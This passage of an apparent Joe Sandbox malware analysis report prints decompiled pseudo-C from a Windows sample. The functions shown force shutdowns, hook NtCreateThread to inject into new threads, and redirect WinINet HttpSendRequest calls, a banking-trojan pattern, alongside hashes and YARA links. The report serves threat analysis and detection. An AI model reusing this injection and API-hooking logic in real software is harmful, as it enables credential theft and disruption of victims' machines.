						E00411ADE(L"SeShutdownPrivilege");
						_t11 =  *0x41ae90; // 0x0
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t11 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					return E00404191(_t19);
				}
			}







            0x0040f965
            0x0040f96a
            0x0040f96c
            0x0040f975
            0x0040f977
            0x0040f979
            0x0040f97e
            0x0040f97e
            0x0040f983
            0x0040f985
            0x0040f9b0
            0x0040f9b2
            0x00000000
            0x0040f9bb
            0x0040f9c2
            0x0040f987
            0x0040f98c
            0x0040f991
            0x0040f9a3
            0x0040f9a8
            0x0040f9af
            0x0040f9af
            0x0040f96e
            0x0040f974
            0x0040f974

            APIs
            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040F9A8
              • Part of subcall function 00404191: ExitWindowsEx.USER32(00000014,80000000), ref: 004041BF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ExitInitiateShutdownSystemWindows
            • String ID: SeShutdownPrivilege
            • API String ID: 1562069236-3733053543
            • Opcode ID: d6e8d649078f41751fd313dac7db1d794ec24055c939ba7fd8d45512392503e3
            • Instruction ID: 0ab3187430107409b3e3823c907dd5f32d3baeccaadc67a6e8e9949e7d8abc96
            • Opcode Fuzzy Hash: d6e8d649078f41751fd313dac7db1d794ec24055c939ba7fd8d45512392503e3
            • Instruction Fuzzy Hash: 12F0E5F22517407CFD255764AC0AFF61B18DB01794F28407EFAC1B59F1CAB90862A62D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404984 Relevance: 4.6, APIs: 3, Instructions: 63nativethreadCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00404984(void* __ecx, void* __edx, void* __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
				void _v28;
				long _v32;
				intOrPtr _v40;
				void* __edi;
				void* _t21;
				void* _t28;
				signed int _t31;
				void* _t35;
				void* _t36;
				void* _t39;
				void* _t41;
				void* _t43;

				_t43 = __esi;
				_t39 = __edx;
				_t36 = __ecx;
				_t21 = E00403E39();
				_t41 = _a16;
				if(_t21 != 0 && NtQueryInformationProcess(_t41, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E00411A8A(_v28) == 0)) {
					_t35 = E00403C5D(_t36, _t39, _v28);
					_t52 = _t35;
					if(_t35 != 0) {
						_t28 = E00403D3B(_t36, _t41, _t43, _t52, _t35, 0);
						if(_t28 != 0) {
							_t31 = _t28 -  *0x41a2a4 + E00404356;
							if(( *0x41a290 & 0x00000008) != 0) {
								_t31 = _t31 ^  *(_a24 + 0xb0);
							}
							 *(_a24 + 0xb0) = _t31;
						}
						CloseHandle(_t35);
					}
				}
				E00403E2A();
				return NtCreateThread(_a4, _a8, _a12, _t41, _a20, _a24, _a28, _a32);
			}















            0x00404984
            0x00404984
            0x00404984
            0x0040498f
            0x00404994
            0x00404999
            0x004049d8
            0x004049da
            0x004049dc
            0x004049e1
            0x004049e8
            0x004049f0
            0x004049fc
            0x00404a01
            0x00404a01
            0x00404a0a
            0x00404a0a
            0x00404a11
            0x00404a11
            0x004049dc
            0x00404a17
            0x00404a3d

            APIs
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 004049AA
            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404A11
              • Part of subcall function 00411A8A: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00411A97
              • Part of subcall function 00411A8A: Thread32First.KERNEL32 ref: 00411AB1
              • Part of subcall function 00411A8A: CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?,00000004,00000000,?), ref: 00411AD0
            • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00404A32
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
            • String ID:
            • API String ID: 3154080929-0
            • Opcode ID: db9e9335c3ab796a3bab87d87c3c09b8ac9909ba71e26eacda1689905936860a
            • Instruction ID: e8c7a4ba2693b920a1a175eea69e4884c44c79e60a7ccf769da377a827864300
            • Opcode Fuzzy Hash: db9e9335c3ab796a3bab87d87c3c09b8ac9909ba71e26eacda1689905936860a
            • Instruction Fuzzy Hash: EC11AF71200245ABDB119F61DC45BAB3BA9FF88308F04413ABE44B52F1C73AD925DB5E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041369C Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON
            Download Yara Rule
            APIs
            • socket.WS2_32(00000000,00000002,00000011), ref: 004136A5
            • bind.WS2_32(00000000,00000017,-0000001D), ref: 004136C5
            • closesocket.WS2_32(00000000), ref: 004136D0
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: bindclosesocketsocket
            • String ID:
            • API String ID: 1873677229-0
            • Opcode ID: 6f8a6aea4d618069bb627f77538a177d2f0e7e108d0e45a90daac578fff26911
            • Instruction ID: 1d42b488269b78db975e02c42e92392a9ab9d72b71aab3b77a94dcd15e7a66f8
            • Opcode Fuzzy Hash: 6f8a6aea4d618069bb627f77538a177d2f0e7e108d0e45a90daac578fff26911
            • Instruction Fuzzy Hash: FBE048367005106BE2201F39AD4EA6F25E99B85B727584719BDB1D21E1D77C88C19124
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404191 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22shutdownCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00404191(void* __eflags) {
				signed int _v124;

				if(E00406140( &_v124) == 0) {
					return 0;
				} else {
					_v124 = _v124 | 0x00000020;
					 *0x41a290 =  *0x41a290 | 0x00000008;
					E00406198( &_v124);
					ExitWindowsEx(0x14, 0x80000000);
					return 1;
				}
			}




            0x004041a2
            0x004041cc
            0x004041a4
            0x004041a4
            0x004041a8
            0x004041b3
            0x004041bf
            0x004041c8
            0x004041c8

            APIs
              • Part of subcall function 00406140: CreateMutexW.KERNEL32(0041A2C8,00000000,0041A958,?,?,0040F1FD,?,?,?,743C152E,00000002), ref: 00406166
            • ExitWindowsEx.USER32(00000014,80000000), ref: 004041BF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CreateExitMutexWindows
            • String ID:
            • API String ID: 2837814579-3916222277
            • Opcode ID: d05c7869634e9a3af85e3a807b90b6ea6e4016e86638a16ae63608f77c9e8919
            • Instruction ID: c7198e515e8023b75db1f9341cef18ce9866ac8149266297d816e8496cc45bbf
            • Opcode Fuzzy Hash: d05c7869634e9a3af85e3a807b90b6ea6e4016e86638a16ae63608f77c9e8919
            • Instruction Fuzzy Hash: 46E08C308042085ADE10EFB19C0AAC97BA89B04709F2005A9AA12FB192D7799065CAA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00406940 Relevance: 3.3, APIs: 2, Instructions: 291COMMON
            Download Yara Rule
            C-Code - Quality: 99%
            			E00406940(signed int __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				int _v36;
				int _v40;
				int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v66;
				intOrPtr _v70;
				char _v72;
				struct _SYSTEMTIME _v88;
				char _v104;
				char _v176;
				short _v280;
				void* __ebx;
				void* __esi;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t124;
				signed short _t126;
				signed short _t127;
				signed short _t135;
				signed short _t140;
				signed short _t145;
				signed char _t150;
				signed int _t154;
				signed int _t164;
				signed int _t165;
				intOrPtr _t166;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				signed int _t185;
				void* _t186;
				signed int _t187;
				int _t190;
				signed int _t192;
				signed short _t199;
				signed int _t218;
				signed int _t219;
				intOrPtr _t220;

				_t216 = __edx;
				_t220 = _a4;
				_t110 =  *((intOrPtr*)(_t220 + 0x30));
				if( *((intOrPtr*)(_t220 + 0x30)) != 0) {
					_t111 = E00416037( &_v12, __edx, __eflags, _t110, 0x4e27, 0x10000000);
					 *(_t220 + 0x2c) =  *(_t220 + 0x2c) & 0x00000000;
					 *(_t220 + 0x28) =  *(_t220 + 0x28) & 0x00000000;
					_t219 = _t111;
					_v56 = _t219;
					__eflags = _t219;
					if(_t219 == 0) {
						L53:
						E00410418(_v56);
						__eflags = 0 -  *(_t220 + 0x2c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t115 = _v12;
					__eflags = _t115 - 0x10;
					if(_t115 <= 0x10) {
						goto L53;
					}
					__eflags =  *((char*)(_t220 + 0x14)) - 1;
					_v16 = 1;
					_t116 = _t115 + _t219;
					__eflags = _t116;
					_v24 = ((0 |  *((char*)(_t220 + 0x14)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t116;
					while(1) {
						_t117 =  *(_t219 + 2) & 0x0000ffff;
						__eflags = _t117 - 0x10;
						if(_t117 < 0x10) {
							goto L53;
						}
						_t199 =  *(_t219 + 4) & 0x0000ffff;
						__eflags = _t199 - _t117;
						if(_t199 >= _t117) {
							goto L53;
						}
						__eflags =  *(_t219 + 6) - _t117;
						if( *(_t219 + 6) >= _t117) {
							goto L53;
						}
						__eflags =  *(_t219 + 8) - _t117;
						if( *(_t219 + 8) >= _t117) {
							goto L53;
						}
						__eflags =  *(_t219 + 0xa) - _t117;
						if( *(_t219 + 0xa) >= _t117) {
							goto L53;
						}
						__eflags =  *(_t219 + 0xc) - _t117;
						if( *(_t219 + 0xc) >= _t117) {
							goto L53;
						}
						__eflags =  *(_t219 + 0xe) - _t117;
						if( *(_t219 + 0xe) >= _t117) {
							goto L53;
						}
						_t201 = (_t199 & 0x0000ffff) + _t219;
						__eflags = ( *_t219 & _v24) - _v24;
						if(( *_t219 & _v24) != _v24) {
							L46:
							_t219 = _t219 + ( *(_t219 + 2) & 0x0000ffff);
							_t87 = _t219 + 0x10; // 0x10
							__eflags = _t87 - _v12;
							if(_t87 > _v12) {
								goto L53;
							}
							__eflags = ( *(_t219 + 2) & 0x0000ffff) + _t219 - _v12;
							if(( *(_t219 + 2) & 0x0000ffff) + _t219 > _v12) {
								goto L53;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t124 = E00406638(_t201,  *((intOrPtr*)(_t220 + 4)),  *((intOrPtr*)(_t220 + 8)));
						__eflags = _t124;
						if(_t124 == 0) {
							goto L46;
						}
						_t125 =  *(_t220 + 0x34);
						_t190 = 0;
						__eflags =  *(_t220 + 0x34);
						if(__eflags == 0) {
							L16:
							_t126 =  *(_t219 + 8) & 0x0000ffff;
							__eflags = _t126 - _t190;
							if(_t126 <= _t190) {
								L18:
								_t127 =  *(_t219 + 0xa) & 0x0000ffff;
								__eflags = _t127 - _t190;
								if(_t127 <= _t190) {
									L20:
									__eflags =  *_t219 & 0x00000010;
									if(( *_t219 & 0x00000010) == 0) {
										L29:
										E004104CB( &_v52,  &_v52, _t190, 0x1c);
										_v52 =  *_t219 & 0x0000ffff;
										_v48 = E00410882(( *(_t219 + 4) & 0x0000ffff) + _t219 | 0xffffffff, ( *(_t219 + 4) & 0x0000ffff) + _t219);
										_t135 =  *(_t219 + 6) & 0x0000ffff;
										__eflags = _t135 - _t190;
										if(_t135 != _t190) {
											__eflags = (_t135 & 0x0000ffff) + _t219 | 0xffffffff;
											_v44 = E00410882((_t135 & 0x0000ffff) + _t219 | 0xffffffff, (_t135 & 0x0000ffff) + _t219);
										} else {
											_v44 = _t190;
										}
										_t140 =  *(_t219 + 0xc) & 0x0000ffff;
										__eflags = _t140 - _t190;
										if(_t140 != _t190) {
											__eflags = (_t140 & 0x0000ffff) + _t219 | 0xffffffff;
											_v40 = E00410882((_t140 & 0x0000ffff) + _t219 | 0xffffffff, (_t140 & 0x0000ffff) + _t219);
										} else {
											_v40 = _t190;
										}
										_t145 =  *(_t219 + 0xe) & 0x0000ffff;
										__eflags = _t145 - _t190;
										if(_t145 != _t190) {
											__eflags = (_t145 & 0x0000ffff) + _t219 | 0xffffffff;
											_v36 = E00410882((_t145 & 0x0000ffff) + _t219 | 0xffffffff, (_t145 & 0x0000ffff) + _t219);
										} else {
											_v36 = _t190;
										}
										_t150 =  *_t219 & 0x0000ffff;
										__eflags = _t150 & 0x00000003;
										if((_t150 & 0x00000003) != 0) {
											E004077A6( *(_t220 + 0x2c),  *(_t220 + 0x28));
											 *(_t220 + 0x2c) = _t190;
											_t154 = E0041046B(__eflags,  &_v52, 0x1c);
											 *(_t220 + 0x28) = _t154;
											__eflags = _t154 - _t190;
											if(_t154 == _t190) {
												E0040777D( &_v52);
												_t220 = _a4;
											} else {
												 *(_t220 + 0x2c) =  *(_t220 + 0x2c) + 1;
											}
											goto L53;
										} else {
											__eflags = _t150 & 0x0000000c;
											if(__eflags == 0) {
												E0040777D( &_v52);
												L45:
												_t220 = _a4;
												goto L46;
											}
											_t192 = E00416037( &_v28, _t216, __eflags,  *((intOrPtr*)(_t220 + 0x30)), _v16, 0x40000000);
											_v32 = _t192;
											__eflags = _t192;
											if(_t192 == 0) {
												L52:
												E00410418(_t192);
												E0040777D( &_v52);
												_t220 = _a4;
												E004077A6( *(_t220 + 0x2c),  *((intOrPtr*)(_a4 + 0x28)));
												_t106 = _t220 + 0x2c;
												 *_t106 =  *(_t220 + 0x2c) & 0x00000000;
												__eflags =  *_t106;
												goto L53;
											}
											_t164 = E0041670D(_t192, _v28);
											__eflags = _t164;
											if(_t164 == 0) {
												goto L52;
											}
											_t224 = _t220 + 0x28;
											_t165 = E004103A8(( *(_t220 + 0x2c) + 1) * 0x1c, _t220 + 0x28);
											__eflags = _t165;
											if(_t165 == 0) {
												goto L52;
											}
											_t166 = _a4;
											_t218 =  *(_t166 + 0x2c);
											_t216 = _t218 + 1;
											 *(_t166 + 0x2c) = _t218 + 1;
											E00410454(_t218 * 0x1c +  *_t224,  &_v52, 0x1c);
											goto L45;
										}
									}
									__eflags =  *(_t219 + 0xc) - _t190;
									if( *(_t219 + 0xc) <= _t190) {
										goto L29;
									}
									E00403F5F( &_v176, _t201, 1,  &_v280);
									_t174 = E00411780( &_v104, ( *(_t219 + 0xc) & 0x0000ffff) + _t219, E00411086(( *(_t219 + 0xc) & 0x0000ffff) + _t219));
									__eflags = _t174;
									if(_t174 == 0) {
										goto L46;
									}
									E00410CE3( &_v176,  &_v104);
									_v20 = 0x80000001;
									_t178 = RegOpenKeyExW(0x80000001,  &_v280, _t190, 1,  &_v20);
									__eflags = _t178;
									if(_t178 != 0) {
										_t179 = _t178 | 0xffffffff;
										__eflags = _t179;
									} else {
										_t179 = E0041449E( &_v20,  &_v176, _t190,  &_v72, 0x10);
										_t220 = _a4;
										_t190 = 0;
									}
									__eflags = _t179 - 0x10;
									if(_t179 == 0x10) {
										GetLocalTime( &_v88);
										__eflags = _v66 - _v88.wDay;
										if(_v66 != _v88.wDay) {
											goto L29;
										}
										__eflags = _v70 - _v88.wMonth;
										if(_v70 == _v88.wMonth) {
											goto L46;
										}
									}
									goto L29;
								}
								_t201 = (_t127 & 0x0000ffff) + _t219;
								_t185 = E00406670((_t127 & 0x0000ffff) + _t219,  *((intOrPtr*)(_t220 + 0x20)),  *((intOrPtr*)(_t220 + 0x24)));
								__eflags = _t185;
								if(_t185 == 0) {
									goto L46;
								}
								goto L20;
							}
							_t201 = (_t126 & 0x0000ffff) + _t219;
							_t186 = E00406670((_t126 & 0x0000ffff) + _t219,  *((intOrPtr*)(_t220 + 0x20)),  *((intOrPtr*)(_t220 + 0x24)));
							__eflags = _t186 - 1;
							if(_t186 == 1) {
								goto L46;
							}
							goto L18;
						}
						_t187 = E004068DC(_t201, _t216, __eflags, 4, _t125,  *((intOrPtr*)(_t220 + 4)),  *((intOrPtr*)(_t220 + 8)));
						__eflags = _t187;
						if(_t187 != 0) {
							goto L46;
						}
						goto L16;
					}
					goto L53;
				}
				return 0;
			}



















































            0x00406940
            0x0040694b
            0x0040694e
            0x00406954
            0x0040696b
            0x00406970
            0x00406974
            0x00406978
            0x0040697a
            0x0040697d
            0x0040697f
            0x00406cbd
            0x00406cc0
            0x00406cc7
            0x00406cca
            0x00000000
            0x00406ccc
            0x00406985
            0x00406988
            0x0040698b
            0x00000000
            0x00000000
            0x00406993
            0x00406997
            0x004069ab
            0x004069ab
            0x004069ad
            0x004069b0
            0x004069b3
            0x004069b3
            0x004069b7
            0x004069bb
            0x00000000
            0x00000000
            0x004069c1
            0x004069c5
            0x004069c8
            0x00000000
            0x00000000
            0x004069ce
            0x004069d2
            0x00000000
            0x00000000
            0x004069d8
            0x004069dc
            0x00000000
            0x00000000
            0x004069e2
            0x004069e6
            0x00000000
            0x00000000
            0x004069ec
            0x004069f0
            0x00000000
            0x00000000
            0x004069f6
            0x004069fa
            0x00000000
            0x00000000
            0x00406a0a
            0x00406a0c
            0x00406a10
            0x00406c45
            0x00406c49
            0x00406c4b
            0x00406c4e
            0x00406c51
            0x00000000
            0x00000000
            0x00406c59
            0x00406c5c
            0x00000000
            0x00000000
            0x00406c5e
            0x00000000
            0x00406c5e
            0x00406a1c
            0x00406a21
            0x00406a23
            0x00000000
            0x00000000
            0x00406a29
            0x00406a2c
            0x00406a2e
            0x00406a30
            0x00406a48
            0x00406a48
            0x00406a4c
            0x00406a4f
            0x00406a69
            0x00406a69
            0x00406a6d
            0x00406a70
            0x00406a8a
            0x00406a8a
            0x00406a8d
            0x00406b46
            0x00406b4d
            0x00406b55
            0x00406b67
            0x00406b6a
            0x00406b6e
            0x00406b71
            0x00406b7e
            0x00406b86
            0x00406b73
            0x00406b73
            0x00406b73
            0x00406b89
            0x00406b8d
            0x00406b90
            0x00406b9d
            0x00406ba5
            0x00406b92
            0x00406b92
            0x00406b92
            0x00406ba8
            0x00406bac
            0x00406baf
            0x00406bbc
            0x00406bc4
            0x00406bb1
            0x00406bb1
            0x00406bb1
            0x00406bc7
            0x00406bca
            0x00406bcc
            0x00406c6c
            0x00406c77
            0x00406c7a
            0x00406c7f
            0x00406c82
            0x00406c84
            0x00406c8e
            0x00406c93
            0x00406c86
            0x00406c86
            0x00406c86
            0x00000000
            0x00406bd2
            0x00406bd2
            0x00406bd4
            0x00406c3d
            0x00406c42
            0x00406c42
            0x00000000
            0x00406c42
            0x00406be9
            0x00406beb
            0x00406bee
            0x00406bf0
            0x00406c98
            0x00406c99
            0x00406ca1
            0x00406ca9
            0x00406cb4
            0x00406cb9
            0x00406cb9
            0x00406cb9
            0x00000000
            0x00406cb9
            0x00406bfb
            0x00406c00
            0x00406c02
            0x00000000
            0x00000000
            0x00406c0f
            0x00406c12
            0x00406c17
            0x00406c19
            0x00000000
            0x00000000
            0x00406c1b
            0x00406c1e
            0x00406c28
            0x00406c29
            0x00406c33
            0x00000000
            0x00406c33
            0x00406bcc
            0x00406a93
            0x00406a97
            0x00000000
            0x00000000
            0x00406aac
            0x00406ac2
            0x00406ac7
            0x00406ac9
            0x00000000
            0x00000000
            0x00406ad9
            0x00406af2
            0x00406af5
            0x00406afb
            0x00406afd
            0x00406b1c
            0x00406b1c
            0x00406aff
            0x00406b10
            0x00406b15
            0x00406b18
            0x00406b18
            0x00406b1f
            0x00406b22
            0x00406b28
            0x00406b32
            0x00406b36
            0x00000000
            0x00000000
            0x00406b3c
            0x00406b40
            0x00000000
            0x00000000
            0x00406b40
            0x00000000
            0x00406b22
            0x00406a7b
            0x00406a7d
            0x00406a82
            0x00406a84
            0x00000000
            0x00000000
            0x00000000
            0x00406a84
            0x00406a5a
            0x00406a5c
            0x00406a61
            0x00406a63
            0x00000000
            0x00000000
            0x00000000
            0x00406a63
            0x00406a3b
            0x00406a40
            0x00406a42
            0x00000000
            0x00000000
            0x00000000
            0x00406a42
            0x00000000
            0x004069b3
            0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d28b656aaf4e45dbe2aebe2f091bb30d1a561210ca9d8f6f777e6cbafaf0dc85
            • Instruction ID: 4b2a6063bc310b9c8d2453bcedbd8375a9ce57764ac8f9d5ffb71517fb2634fb
            • Opcode Fuzzy Hash: d28b656aaf4e45dbe2aebe2f091bb30d1a561210ca9d8f6f777e6cbafaf0dc85
            • Instruction Fuzzy Hash: 84B1B071800215AADB24EFA5C941AFEB7B4FF04314F41452BF997B76C1D338A9A1CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040F48A Relevance: 3.0, APIs: 2, Instructions: 35COMMON
            Download Yara Rule
            C-Code - Quality: 61%
            			E0040F48A(char* __esi) {
				void* _v40;
				intOrPtr _v46;
				signed char _v48;
				struct _OSVERSIONINFOW _v324;
				int _t15;
				signed int _t18;
				short _t22;
				char* _t24;

				_t24 = __esi;
				E004104B9(__esi, 6);
				_v324.dwOSVersionInfoSize = 0x11c;
				_t15 = GetVersionExW( &_v324);
				if(_t15 != 0) {
					__imp__GetNativeSystemInfo( &_v40);
					 *__esi = E0040F3B4();
					_t18 = 0;
					if(_v48 <= 0xff && _v46 == 0) {
						_t18 = _v48 & 0x000000ff;
					}
					 *(_t24 + 1) = _t18;
					asm("sbb eax, eax");
					 *((short*)(_t24 + 2)) =  !0xffff & _v324.dwBuildNumber;
					_t22 = _v40;
					 *((short*)(_t24 + 4)) = _t22;
					return _t22;
				}
				return _t15;
			}











            0x0040f48a
            0x0040f496
            0x0040f4a2
            0x0040f4ac
            0x0040f4b4
            0x0040f4ba
            0x0040f4c5
            0x0040f4cc
            0x0040f4d2
            0x0040f4da
            0x0040f4da
            0x0040f4de
            0x0040f4ec
            0x0040f4f6
            0x0040f4fa
            0x0040f4fe
            0x00000000
            0x0040f4fe
            0x0040f503

            APIs
            • GetVersionExW.KERNEL32(?,?,00000006), ref: 0040F4AC
            • GetNativeSystemInfo.KERNEL32(?), ref: 0040F4BA
              • Part of subcall function 0040F3B4: GetVersionExW.KERNEL32(?,00000000), ref: 0040F3D3
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Version$InfoNativeSystem
            • String ID:
            • API String ID: 2518960133-0
            • Opcode ID: 078910cdb90759a2d7dab9f908eb402222ecb3a690a517749784946ccd7c3463
            • Instruction ID: fc9052333b891a287949a88adcc73f52bac45bd978bbcd408aef35d370843cb1
            • Opcode Fuzzy Hash: 078910cdb90759a2d7dab9f908eb402222ecb3a690a517749784946ccd7c3463
            • Instruction Fuzzy Hash: E701A9349012995ADB31EFB5C9056DEB7F4AF18300F0084BAD559F3A91E638DA88CB6D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00416937 Relevance: 1.5, APIs: 1, Instructions: 41comCOMMON
            Download Yara Rule
            C-Code - Quality: 75%
            			E00416937(void* __ecx) {
				void* _v8;
				char* _t12;
				intOrPtr _t13;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				void* _t27;

				_t12 =  &_v8;
				_v8 = 0;
				__imp__CoCreateInstance(0x401400, 0, 0x4401, 0x4013f0, _t12, _t27, __ecx);
				if(_t12 != 0) {
					_t13 = 0;
				} else {
					_t14 = _v8;
					 *((intOrPtr*)( *_t14 + 0xfc))(_t14, 0);
					_t16 = _v8;
					 *((intOrPtr*)( *_t16 + 0x120))(_t16, 0);
					_t18 = _v8;
					 *((intOrPtr*)( *_t18 + 0x118))(_t18, 0);
					_t20 = _v8;
					 *((intOrPtr*)( *_t20 + 0x110))(_t20, 0xffffffff);
					_t13 = _v8;
				}
				return _t13;
			}











            0x0041693c
            0x00416952
            0x00416955
            0x0041695d
            0x00416999
            0x0041695f
            0x0041695f
            0x00416966
            0x0041696c
            0x00416973
            0x00416979
            0x00416980
            0x00416986
            0x0041698e
            0x00416994
            0x00416994
            0x0041699d

            APIs
            • CoCreateInstance.OLE32(00401400,00000000,00004401,004013F0,?,?,?,?,004169B0,?,?,?,?,004088C7,?,?), ref: 00416955
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CreateInstance
            • String ID:
            • API String ID: 542301482-0
            • Opcode ID: c5d050de737f0e002d35acc1570230c3144ce1b69476bd7c09722dbe22335522
            • Instruction ID: fad24edab999a4660c9e4c7dd33132fa5f88240d1f1c44a94e3da306fb0d0201
            • Opcode Fuzzy Hash: c5d050de737f0e002d35acc1570230c3144ce1b69476bd7c09722dbe22335522
            • Instruction Fuzzy Hash: 48016DB4A00218FFCB14CB95CD4DEDB7BBCEF49350B2001A5F805EB290C635AE01DA64
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00410542 Relevance: 1.5, APIs: 1, Instructions: 21timeCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00410542() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t12;
				void* _t14;

				_t12 = _t14 - 0x78;
				_t7 = GetTimeZoneInformation(_t12 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t12 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t12 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}








            0x00410543
            0x00410551
            0x0041055a
            0x00410564
            0x00410573
            0x00410566
            0x00410566
            0x00000000
            0x00410566
            0x0041055c
            0x0041055c
            0x00410569
            0x0041056e
            0x0041056e
            0x00410579

            APIs
            • GetTimeZoneInformation.KERNEL32(?), ref: 00410551
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: InformationTimeZone
            • String ID:
            • API String ID: 565725191-0
            • Opcode ID: 4d3c7366648099c4f04f86286804f6de2ace1b654d1f210a2a9e286de0fd91f7
            • Instruction ID: 5e68c08ff2e91f53d0791e4979599644742aad1a517ca002781c8c94736de4ad
            • Opcode Fuzzy Hash: 4d3c7366648099c4f04f86286804f6de2ace1b654d1f210a2a9e286de0fd91f7
            • Instruction Fuzzy Hash: 10E08631A44108EBDB24DBA4DE419DD77FAAB05314F700926E501E2250D2A8D9C58E4A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004063F7 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
            Download Yara Rule
            C-Code - Quality: 41%
            			E004063F7() {
				char _t1;
				intOrPtr _t2;
				signed int _t19;
				void* _t21;
				void* _t22;

				_t1 =  *0x41a2b4;
				if(_t1 == 0) {
					_t1 =  *0x41a2b0;
					 *0x41a024 = E00404984;
				} else {
					 *0x41a024 = E00404A40;
				}
				E0041A020 = _t1;
				_t2 =  *0x41a2c0; // 0x77497840
				 *0x41a030 = _t2;
				 *0x41a040 = GetFileAttributesExW;
				 *0x41a050 = HttpSendRequestW;
				 *0x41a060 = HttpSendRequestA;
				 *0x41a070 = HttpSendRequestExW;
				 *0x41a080 = HttpSendRequestExA;
